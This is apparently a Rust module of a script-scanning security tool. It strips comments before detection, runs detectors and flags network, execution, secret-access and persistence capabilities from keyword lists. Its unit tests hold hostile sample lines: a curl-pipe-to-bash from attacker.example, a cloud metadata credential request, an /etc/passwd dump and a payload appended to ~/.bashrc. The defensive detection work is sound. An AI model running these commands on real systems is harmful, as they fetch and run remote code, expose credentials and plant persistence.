use super::manifests::strip_inline_hash_comment;
use super::ArtifactLink;
use crate::artifact_graph::{ArtifactCapability, ArtifactCapabilityFact, ArtifactRelation};
use crate::detectors::patterns::{line_invokes_shell_or_interpreter, RE_SHELL_SOURCE};
use crate::detectors::scripts::{
detect_deferred_execution, detect_file_secret_to_network_flow, detect_injection_patterns,
detect_node_process_exec, detect_node_secret_fs_access, detect_powershell_dynamic_exec,
detect_powershell_persistence, detect_python_exec_network, detect_python_secret_system_access,
detect_remote_binary_downloads, detect_shell_persistence_write, detect_shell_side_effects,
detect_typosquatted_install, references_dotenv_file,
};
use crate::findings::ArtifactKind;
use crate::services::ArtifactOrchestratorService;
use std::path::Path;
/// Lower-case language tags (file extensions) that are treated as using `#`
/// comments.
///
/// `strip_comments_for_detection` only rewrites content whose language tag is
/// an exact match for one of these entries.
const HASH_COMMENT_LANGUAGES: &[&str] = &[
    // Shell dialects
    "sh",
    "bash",
    "zsh",
    "ksh",
    "fish",
    // Python, Ruby, Perl
    "py",
    "rb",
    "pl",
    // YAML
    "yaml",
    "yml",
    // PowerShell scripts, modules and data files
    "ps1",
    "psm1",
    "psd1",
];
/// Returns a copy of `content` prepared for detector matching.
///
/// When `language` is not listed in `HASH_COMMENT_LANGUAGES` the text is
/// copied through untouched. Otherwise each line is passed through
/// `strip_inline_hash_comment` and the results are joined with `\n`, one
/// output line per input line. A final `\n` is appended when the input ended
/// with one.
///
/// Note that `str::lines` also drops a `\r` that precedes `\n`, so CRLF input
/// comes back with LF line endings on this path.
pub(super) fn strip_comments_for_detection(content: &str, language: &str) -> String {
    let uses_hash_comments = HASH_COMMENT_LANGUAGES
        .iter()
        .any(|known| *known == language);
    if !uses_hash_comments {
        return content.to_owned();
    }

    let mut cleaned = String::with_capacity(content.len());
    for (index, raw_line) in content.lines().enumerate() {
        // Separator goes *between* lines, never before the first one.
        if index > 0 {
            cleaned.push('\n');
        }
        cleaned.push_str(strip_inline_hash_comment(raw_line));
    }
    // `str::lines` swallows the last terminator; put it back so the output
    // ends the same way the input did.
    if content.ends_with('\n') {
        cleaned.push('\n');
    }
    cleaned
}
/// Runs every script detector over `content` and returns their findings.
///
/// * `artifact_orchestration` - service used for the final
///   permission/network pass.
/// * `path` - location of the script; its extension (ASCII lower-cased, empty
///   when absent or not valid UTF-8) is the `language` handed to detectors,
///   and its display form is the artifact path they receive.
/// * `content` - raw script text.
///
/// Detectors never see the raw text: they receive the output of
/// `strip_comments_for_detection`, its ASCII lower-cased form, or both.
/// Findings are appended in the order the detectors are invoked below.
pub(crate) fn analyze_script(
    artifact_orchestration: &ArtifactOrchestratorService,
    path: &Path,
    content: &str,
) -> Vec<crate::findings::Finding> {
    let language = match path.extension().and_then(|ext| ext.to_str()) {
        Some(ext) => ext.to_ascii_lowercase(),
        None => String::new(),
    };
    let shown_path = path.display().to_string();

    // Two views of the same comment-stripped text: original case and lower case.
    let sanitized = strip_comments_for_detection(content, &language);
    let lowered = sanitized.to_ascii_lowercase();

    let mut collected = Vec::new();

    // Detectors that take both views of the text.
    collected.extend(detect_remote_binary_downloads(&lowered, &sanitized, &shown_path));
    collected.extend(detect_deferred_execution(&lowered, &sanitized, &shown_path));

    // Detectors that take the lower-cased text plus the language tag.
    collected.extend(detect_node_process_exec(&lowered, &language, &shown_path));
    collected.extend(detect_python_exec_network(&lowered, &language, &shown_path));
    collected.extend(detect_python_secret_system_access(&lowered, &language, &shown_path));
    collected.extend(detect_powershell_dynamic_exec(&lowered, &language, &shown_path));
    collected.extend(detect_powershell_persistence(&lowered, &language, &shown_path));
    collected.extend(detect_shell_side_effects(&lowered, &language, &shown_path));
    collected.extend(detect_shell_persistence_write(&lowered, &language, &shown_path));
    collected.extend(detect_node_secret_fs_access(&lowered, &language, &shown_path));
    collected.extend(detect_file_secret_to_network_flow(&lowered, &language, &shown_path));
    collected.extend(detect_typosquatted_install(&lowered, &language, &shown_path));

    // Takes both views of the text and the language tag.
    collected.extend(detect_injection_patterns(
        &lowered,
        &sanitized,
        &language,
        &shown_path,
    ));

    // Final pass through the orchestrator, on the original-case stripped text.
    collected.extend(artifact_orchestration.permission_and_network_findings(
        path,
        &sanitized,
        ArtifactKind::ReferencedArtifact,
    ));

    collected
}
pub(crate) fn script_capabilities(content: &str) -> Vec<ArtifactCapabilityFact> {
let lower = content.to_ascii_lowercase();
let mut capabilities = Vec::new();
if lower.contains("curl ")
|| lower.contains("wget ")
|| lower.contains("invoke-webrequest")
|| lower.contains("http://")
|| lower.contains("https://")
{
capabilities.push(ArtifactOrchestratorService::observed_capability(
ArtifactCapability::NetworkAccess,
));
}
if lower.lines().any(line_invokes_shell_or_interpreter)
|| lower.contains("npm install")
|| lower.contains("pip install")
|| lower.contains("cargo install")
{
capabilities.push(ArtifactOrchestratorService::observed_capability(
ArtifactCapability::InstallExecution,
));
}
if lower.contains("subprocess.")
|| lower.contains("os.system(")
|| lower.contains("os.execvp(")
|| lower.contains("os.execvpe(")
|| lower.contains("child_process.exec(")
|| lower.contains("child_process.spawn(")
|| lower.contains("child_process.execsync(")
|| lower.contains("child_process.spawnsync(")
|| lower.contains("spawn(")
|| lower.contains("exec(")
|| lower.contains("start-process")
|| lower.contains("iex ")
|| lower.contains("iex(")
{
capabilities.push(ArtifactOrchestratorService::observed_capability(
ArtifactCapability::ProcessExecution,
));
}
if lower.contains("process.env")
|| lower.contains("os.environ")
|| lower.contains("getenv(")
|| references_dotenv_file(&lower)
|| lower.contains("access_token")
|| lower.contains("api_token")
|| lower.contains("auth_token")
|| lower.contains("bearer_token")
|| lower.contains("secret_key")
|| lower.contains("client_secret")
|| lower.contains("_authtoken")
{
capabilities.push(ArtifactOrchestratorService::observed_capability(
ArtifactCapability::SecretAccess,
));
}
if lower.contains("crontab")
|| lower.contains("schtasks")
|| lower.contains("launchctl")
|| lower.contains("runonce")
|| lower.contains("autostart")
|| lower.contains("register-scheduledtask")
{
capabilities.push(ArtifactOrchestratorService::observed_capability(
ArtifactCapability::PersistenceSurface,
));
}
if lower.contains("writefilesync(")
|| lower.contains("tee ")
|| contains_shell_append_redirect(&lower)
|| lower.contains("> /etc/")
|| lower.contains("set-content")
{
capabilities.push(ArtifactOrchestratorService::observed_capability(
ArtifactCapability::FilesystemWrite,
));
}
capabilities
}
/// Heuristically decides whether `lower` contains a shell `>>` append
/// redirect rather than a bit-shift.
///
/// Every non-overlapping `>>` is classified by the first byte that follows it
/// once spaces and tabs are skipped:
///
/// * nothing left in the input: counts as a redirect;
/// * `/`, `~`, `$`, `"`, `'` or `.`: counts as a redirect;
/// * an ASCII letter or `_`: counts only when `>>` starts the input or is
///   preceded by a space, tab, `\n` or `\r` (so `x>>shift` is ignored);
/// * anything else (line break, digit, other bytes): not a redirect.
///
/// Returns `true` as soon as one occurrence qualifies.
fn contains_shell_append_redirect(lower: &str) -> bool {
    let raw = lower.as_bytes();
    lower.match_indices(">>").any(|(pos, operator)| {
        let operand = raw[pos + operator.len()..]
            .iter()
            .copied()
            .find(|&byte| byte != b' ' && byte != b'\t');
        match operand {
            // `>>` is the last thing in the input.
            None => true,
            // Looks like the start of a path, variable or quoted target.
            Some(b'/' | b'~' | b'$' | b'"' | b'\'' | b'.') => true,
            // A bare word is ambiguous with `a >> b`; require whitespace (or
            // start of input) immediately before the operator.
            Some(lead) if lead.is_ascii_alphabetic() || lead == b'_' => pos
                .checked_sub(1)
                .map_or(true, |prev| matches!(raw[prev], b' ' | b'\t' | b'\n' | b'\r')),
            // Line breaks, digits and everything else: treat as not a redirect.
            Some(_) => false,
        }
    })
}
pub(crate) fn script_relations(content: &str) -> Vec<ArtifactLink> {
let lower = content.to_ascii_lowercase();
let mut links = Vec::new();
if lower.contains("curl ") || lower.contains("wget ") || lower.contains("invoke-webrequest") {
links.push(ArtifactLink {
target: "remote-resource".to_string(),
relation: ArtifactRelation::Downloads,
});
}
if lower.lines().any(line_invokes_shell_or_interpreter)
|| lower.contains("start-process")
|| lower.contains("subprocess.")
|| lower.contains("os.system(")
|| lower.contains("exec(")
|| lower.contains("spawn(")
|| lower.contains("child_process")
|| lower.contains("iex ")
|| lower.contains("iex(")
{
links.push(ArtifactLink {
target: "process".to_string(),
relation: ArtifactRelation::Executes,
});
}
if lower.contains("import ")
|| lower.contains("require(")
|| lower.contains("source ")
|| RE_SHELL_SOURCE.is_match(&lower)
{
links.push(ArtifactLink {
target: "runtime-module".to_string(),
relation: ArtifactRelation::Loads,
});
}
if lower.contains("crontab")
|| lower.contains("schtasks")
|| lower.contains("launchctl")
|| lower.contains("runonce")
|| lower.contains("autostart")
|| lower.contains("register-scheduledtask")
{
links.push(ArtifactLink {
target: "persistence-surface".to_string(),
relation: ArtifactRelation::Persists,
});
}
if lower.contains("http://") || lower.contains("https://") || lower.contains("socket.") {
links.push(ArtifactLink {
target: "network".to_string(),
relation: ArtifactRelation::ConnectsTo,
});
}
if lower.contains("open(")
|| lower.contains("readfilesync(")
|| lower.contains("cat ")
|| lower.contains("rg ")
{
links.push(ArtifactLink {
target: "filesystem".to_string(),
relation: ArtifactRelation::Reads,
});
}
if lower.contains("writefilesync(")
|| lower.contains("tee ")
|| contains_shell_append_redirect(&lower)
|| lower.contains("> /etc/")
|| lower.contains("set-content")
{
links.push(ArtifactLink {
target: "filesystem".to_string(),
relation: ArtifactRelation::Writes,
});
}
if lower.contains("process.env")
|| lower.contains("os.environ")
|| lower.contains("getenv(")
|| references_dotenv_file(&lower)
|| lower.contains("access_token")
|| lower.contains("api_token")
|| lower.contains("auth_token")
|| lower.contains("bearer_token")
|| lower.contains("secret_key")
|| lower.contains("client_secret")
|| lower.contains("_authtoken")
{
links.push(ArtifactLink {
target: "secrets".to_string(),
relation: ArtifactRelation::AccessesSecrets,
});
}
links
}
// Unit tests for the script analysis helpers in this file: capability and
// relation extraction, comment stripping ahead of detection, dotenv reference
// matching, and the `>>` append-redirect heuristic.
#[cfg(test)]
mod tests {
use super::*;
// True when any fact in `caps` carries the `target` capability.
fn capability_present(caps: &[ArtifactCapabilityFact], target: ArtifactCapability) -> bool {
caps.iter().any(|fact| fact.capability == target)
}
// True when any link in `links` points at the `target` string.
fn relation_target_present(links: &[ArtifactLink], target: &str) -> bool {
links.iter().any(|link| link.target == target)
}
// A line starting with `bash <script>` must yield InstallExecution.
#[test]
fn script_capabilities_detects_bash_token() {
let content = "bash install.sh\n";
let caps = script_capabilities(content);
assert!(capability_present(
&caps,
ArtifactCapability::InstallExecution
));
}
// `sh` as the very first token of the content must also yield InstallExecution.
#[test]
fn script_capabilities_detects_sh_at_column_zero() {
let content = "sh install.sh\n";
let caps = script_capabilities(content);
assert!(capability_present(
&caps,
ArtifactCapability::InstallExecution
));
}
// `publish` ends in the letters `sh`; that must not count as a shell invocation.
#[test]
fn script_capabilities_skips_publish_word() {
let content = "npm run publish\n";
let caps = script_capabilities(content);
assert!(!capability_present(
&caps,
ArtifactCapability::InstallExecution
));
}
// The literal phrase `npm install` must yield InstallExecution.
#[test]
fn script_capabilities_keeps_npm_install_phrase() {
let content = "npm install foo\n";
let caps = script_capabilities(content);
assert!(capability_present(
&caps,
ArtifactCapability::InstallExecution
));
}
// `bash <script>` must produce a link whose target is "process".
#[test]
fn script_relations_detects_bash_token() {
let content = "bash install.sh\n";
let links = script_relations(content);
assert!(relation_target_present(&links, "process"));
}
// `publish` must not produce a "process" link.
#[test]
fn script_relations_skips_publish_word() {
let content = "npm run publish\n";
let links = script_relations(content);
assert!(!relation_target_present(&links, "process"));
}
// `finish` inside an echoed string must not produce a "process" link.
#[test]
fn script_relations_skips_finish_step() {
let content = "echo \"please finish setup\"\n";
let links = script_relations(content);
assert!(!relation_target_present(&links, "process"));
}
// `iex ` followed by an argument must produce a "process" link.
#[test]
fn script_relations_records_executes_for_iex_alias() {
let content = "iex $payload\n";
let links = script_relations(content);
assert!(
relation_target_present(&links, "process"),
"`iex $payload` must produce an Executes edge; got {links:?}",
);
}
// Parity check: the same `iex` input must set both the ProcessExecution
// capability and the "process" link.
#[test]
fn iex_flips_both_capability_and_relation() {
let content = "iex $payload\n";
let caps = script_capabilities(content);
let links = script_relations(content);
assert!(caps
.iter()
.any(|c| c.capability == ArtifactCapability::ProcessExecution));
assert!(relation_target_present(&links, "process"));
}
// A `curl https://...` that only appears after `#` in a `.sh` file must not
// raise SCRIPT_REMOTE_BINARY_DOWNLOAD.
#[test]
fn analyze_script_skips_remote_download_inside_shell_comment() {
let path = std::path::Path::new("/pkg/install.sh");
let content = "echo done # was: curl https://old/install.sh\n";
let service = ArtifactOrchestratorService::new();
let findings = analyze_script(&service, path, content);
assert!(
!findings
.iter()
.any(|f| f.rule_id == "SCRIPT_REMOTE_BINARY_DOWNLOAD"),
"documentation comment must not fire SCRIPT_REMOTE_BINARY_DOWNLOAD; got {findings:?}",
);
}
// Same as above for a `#` comment in a `.py` file.
#[test]
fn analyze_script_skips_remote_download_inside_python_comment() {
let path = std::path::Path::new("/pkg/setup.py");
let content = "x = 1 # was using curl https://old/install.sh\n";
let service = ArtifactOrchestratorService::new();
let findings = analyze_script(&service, path, content);
assert!(
!findings
.iter()
.any(|f| f.rule_id == "SCRIPT_REMOTE_BINARY_DOWNLOAD"),
"Python comment must not fire SCRIPT_REMOTE_BINARY_DOWNLOAD; got {findings:?}",
);
}
// Guard against over-stripping: a real `curl ... | bash` line must still
// raise SCRIPT_REMOTE_BINARY_DOWNLOAD.
#[test]
fn analyze_script_still_detects_uncommented_remote_download() {
let path = std::path::Path::new("/pkg/install.sh");
let content = "curl https://attacker.example/install.sh | bash\n";
let service = ArtifactOrchestratorService::new();
let findings = analyze_script(&service, path, content);
assert!(
findings
.iter()
.any(|f| f.rule_id == "SCRIPT_REMOTE_BINARY_DOWNLOAD"),
"uncommented curl pipe-to-bash MUST still fire; got {findings:?}",
);
}
// A metadata-service address that only appears after `#` must raise neither
// METADATA_SERVICE_ACCESS nor INTERNAL_NETWORK_ACCESS.
#[test]
fn analyze_script_skips_internal_network_inside_shell_comment() {
let path = std::path::Path::new("/pkg/install.sh");
let content = "echo done # was: curl 169.254.169.254/latest/meta-data\n";
let service = ArtifactOrchestratorService::new();
let findings = analyze_script(&service, path, content);
assert!(
!findings
.iter()
.any(|f| f.rule_id == "METADATA_SERVICE_ACCESS"),
"comment must not fire METADATA_SERVICE_ACCESS; got {findings:?}",
);
assert!(
!findings
.iter()
.any(|f| f.rule_id == "INTERNAL_NETWORK_ACCESS"),
"comment must not fire INTERNAL_NETWORK_ACCESS; got {findings:?}",
);
}
// Guard against over-stripping: an uncommented metadata-service URL must
// still raise METADATA_SERVICE_ACCESS.
#[test]
fn analyze_script_still_detects_uncommented_metadata_target() {
let path = std::path::Path::new("/pkg/install.sh");
let content = "curl http://169.254.169.254/latest/meta-data/iam/\n";
let service = ArtifactOrchestratorService::new();
let findings = analyze_script(&service, path, content);
assert!(
findings
.iter()
.any(|f| f.rule_id == "METADATA_SERVICE_ACCESS"),
"uncommented metadata-service hit MUST still fire; got {findings:?}",
);
}
// Stripping must keep the number of lines and the trailing-newline state of
// the input, including for a line that is nothing but a comment.
#[test]
fn strip_comments_for_detection_preserves_line_count() {
let content = "alpha\n# pure comment line\nbeta # inline\n";
let stripped = strip_comments_for_detection(content, "sh");
assert_eq!(
stripped.lines().count(),
content.lines().count(),
"line count MUST be preserved; got {stripped:?}",
);
assert_eq!(stripped.ends_with('\n'), content.ends_with('\n'));
}
// "js" is not a hash-comment language, so the content must come back unchanged.
#[test]
fn strip_comments_for_detection_leaves_javascript_untouched() {
let js = "const x = 'ok'; // comment\n";
let stripped = strip_comments_for_detection(js, "js");
assert_eq!(stripped, js, "`.js` content must round-trip unchanged");
}
// Names that merely start with or contain `.env` / `env` (`.envrc`,
// `.envelope`, `.environment`, ...) must not be treated as dotenv references.
#[test]
fn references_dotenv_file_rejects_lookalike_filenames() {
let benign = [
"echo .envrc",
"load .envelope",
"open(\".environment/default.cfg\")",
"read .envconfig",
"MY_ENV=production",
"subscriber.envoy(message)",
"config = parse(.environments)",
];
for sample in benign {
assert!(
!references_dotenv_file(&sample.to_ascii_lowercase()),
"must NOT classify lookalike as dotenv reference: {sample:?}"
);
}
}
// Real dotenv usage (the `dotenv` package, `load_dotenv`, or a file named
// exactly `.env`) must be recognized. Samples are lower-cased before matching.
#[test]
fn references_dotenv_file_fires_on_genuine_dotenv_references() {
let positive = [
"require('dotenv').config()",
"load_dotenv()",
"import dotenv",
"open(\".env\")",
"open('.env')",
"open(\"/etc/.env\")",
"cat .env",
"read .env",
"fs.readFile(\"./.env\")",
"with open('.env') as f:",
];
for sample in positive {
assert!(
references_dotenv_file(&sample.to_ascii_lowercase()),
"must classify genuine dotenv reference: {sample:?}"
);
}
}
// End-to-end check: sourcing `.envrc` must not raise the SecretAccess capability.
#[test]
fn script_capabilities_does_not_emit_secret_access_for_envrc_lookalikes() {
let content =
"echo \"setting up direnv\"\nsource .envrc\nfetch https://example.invalid/x\n";
let caps = script_capabilities(content);
assert!(
!capability_present(&caps, ArtifactCapability::SecretAccess),
"direnv .envrc reference must NOT raise SecretAccess; got {caps:?}"
);
}
// End-to-end check: `.envelope` must not produce a "secrets" link.
#[test]
fn script_relations_does_not_emit_secrets_for_envelope_lookalikes() {
let content = "open_envelope = lambda f: parse(f)\nread .envelope\n";
let links = script_relations(content);
assert!(
!relation_target_present(&links, "secrets"),
".envelope reference must NOT raise AccessesSecrets; got {links:?}"
);
}
// `load_dotenv` usage must set both the SecretAccess capability and the
// "secrets" link.
#[test]
fn script_capabilities_still_raises_secret_access_for_load_dotenv() {
let content = "from dotenv import load_dotenv\nload_dotenv()\n";
let caps = script_capabilities(content);
assert!(capability_present(&caps, ArtifactCapability::SecretAccess));
let links = script_relations(content);
assert!(relation_target_present(&links, "secrets"));
}
// `>>` used as a bit-shift (numeric right-hand side, or no whitespace before
// the operator) must raise neither FilesystemWrite nor any "filesystem" link.
#[test]
fn script_capabilities_does_not_fire_filesystem_write_on_bitshift() {
for sample in [
"shift = flags >> 3\n",
"let x = value >> 8;\n",
"result = num >> 2",
"logits >> 2",
"x>>shift", ] {
let caps = script_capabilities(sample);
assert!(
!capability_present(&caps, ArtifactCapability::FilesystemWrite),
"must NOT raise FilesystemWrite on bitshift: {sample:?} -> {caps:?}"
);
let links = script_relations(sample);
assert!(
!relation_target_present(&links, "filesystem"),
"must NOT raise filesystem Writes edge on bitshift: {sample:?} -> {links:?}"
);
}
}
// `>>` followed by a path, `~`, a quoted target, or a bare file name after
// whitespace must raise FilesystemWrite and a "filesystem" link.
#[test]
fn script_capabilities_fires_filesystem_write_on_shell_append() {
for sample in [
"echo done >> /tmp/log.txt\n",
"cat /etc/passwd >> dump.log\n",
"echo $payload >> ~/.bashrc",
"echo done >> \"$HOME/.zshrc\"\n",
"echo data >>'/tmp/out'",
] {
let caps = script_capabilities(sample);
assert!(
capability_present(&caps, ArtifactCapability::FilesystemWrite),
"must raise FilesystemWrite on shell append: {sample:?} -> {caps:?}"
);
let links = script_relations(sample);
assert!(
relation_target_present(&links, "filesystem"),
"must raise filesystem Writes edge on shell append: {sample:?} -> {links:?}"
);
}
}
}